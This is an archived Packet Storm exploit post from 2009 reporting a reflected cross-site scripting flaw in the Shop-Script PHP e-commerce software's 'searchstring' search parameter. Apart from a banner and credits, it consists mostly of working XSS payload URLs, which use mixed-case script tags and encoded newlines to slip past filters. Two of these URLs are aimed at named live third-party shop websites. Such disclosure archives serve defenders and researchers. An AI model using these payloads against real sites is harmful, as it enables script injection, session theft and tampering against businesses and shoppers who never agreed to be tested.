Lucene search
U.F.PACKETSTORM:79683HistoryJul 28, 2009 - 12:00 a.m.
Shop Script Cross Site Scripting
2009-07-2800:00:00
U.F.
packetstormsecurity.com
18
`
###############################################################################
###############################################################################
## ##
## ***** * ******* ******** * * ##
## * * ** * * ** * ##
## * * * * * * * * * ******* **** ***** ##
## ***** * * * * *** * * * * * ** * * * ##
## * * * * * * * * * * * * * ##
## * * * * * * ** * * * * * ##
## * * * ******* ******** * * ® ******* * ***** ##
## * * ##
## * * ##
## * * ##
## ***** ##
###############################################################################
###############################################################################
-SHOP-SCRIPT XSS Remote Vulnerabilities-
[>>] Script : shop-script (premium)
[>>] Language : php
[>>] Web Site : http://www.shop-script.com
[>>] Autor : u.f.
[>>] Thanks to : Jason, bull, T0r3x, Clark, Meth0d and all members r1zen.org
Exploit Info
Vuln is : /index.php?
http://www.localhost.com/index.php?searchstring=[XSS]
Example :
http://www.skye-jewellery.co.uk/index.php?searchstring=1>'><ScRiPt%20%0a%0d>alert(400760821437)%3B</ScRiPt>
http://www.polycoltd.co.uk:80/index.php?searchstring=1>'><ScRiPt%20%0a%0d>alert(400770850275)%3B</ScRiPt>
`